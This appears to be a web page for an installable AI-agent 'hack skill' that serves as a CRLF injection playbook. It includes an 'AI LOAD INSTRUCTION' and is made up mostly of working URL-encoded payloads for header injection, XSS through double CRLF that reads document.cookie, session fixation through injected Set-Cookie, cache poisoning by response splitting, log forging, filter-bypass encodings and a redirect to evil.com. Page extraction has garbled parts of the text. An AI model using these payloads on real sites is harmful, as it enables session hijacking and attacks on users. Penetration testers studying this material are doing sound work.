Loading...
Loading...
CRLF injection playbook. Use when user input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where carriage-return/line-feed characters can split or inject content.
npx skill4agent add yaklang/hack-skills crlf-injectionAI LOAD INSTRUCTION: CRLF injection (HTTP response splitting) techniques. Covers header injection, response body injection via double CRLF, XSS escalation, cache poisoning, and encoding bypass. Often overlooked by scanners but chains into XSS, session fixation, and cache attacks.
\r\n%0D%0ANormal: Location: /page?url=USER_INPUT
Attack: Location: /page?url=%0D%0ASet-Cookie:admin=true
Result: Two headers — Location + injected Set-Cookie%0D%0ANew-Header:injected
# In URL parameter:
https://target.com/redirect?url=%0D%0AX-Injected:true
# Check response headers for "X-Injected: true"%0D%0A%0D%0A<script>alert(1)</script>
# Result:
HTTP/1.1 302 Found
Location: /page
<script>alert(1)</script>%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200| Filter | Bypass |
|---|---|
Blocks | Try |
| URL decodes once | Double-encode: |
Strips | Use URL-encoded form |
| Blocks in value only | Inject in parameter name |
# Unicode/UTF-8 bypass:
%E5%98%8A%E5%98%8D → decoded as CRLF in some parsers
# Double URL encoding:
%250D%250A → server decodes to %0D%0A → interpreted as CRLF
# Partial injection (LF only):
%0A → some servers accept LF without CR# Inject Set-Cookie via CRLF in redirect parameter:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
# Result:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id
# Victim uses attacker's session → attacker hijacks after login# Two CRLF sequences end headers and inject response body:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>
# Result:
HTTP/1.1 302 Found
Location: /page
<script>alert(document.cookie)</script># Inject new Location header before the original:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A
# Some servers use the LAST Location header → redirect to evil.com// PHP — header() with user input (PHP < 5.1.2 vulnerable):
header("Location: " . $_GET['url']);
// Python — redirect with unsanitized input:
return redirect(request.args.get('next'))
// Node.js — setHeader with user input:
res.setHeader('X-Custom', userInput);
// Java — response.setHeader with user input:
response.setHeader("Location", request.getParameter("url"));□ Inject %0D%0A in redirect URL parameters
□ Inject %0D%0A in Set-Cookie name/value paths
□ Try double CRLF for body injection → XSS
□ Test encoding bypasses: double-encode, Unicode (%E5%98%8D%E5%98%8A), LF-only (%0A)
□ Check if response is cacheable → cache poisoning
□ Test in User-Agent / Referer for log injection
□ Test CRLF + Set-Cookie for session fixation
□ Verify if Location header can be injected in 302 responses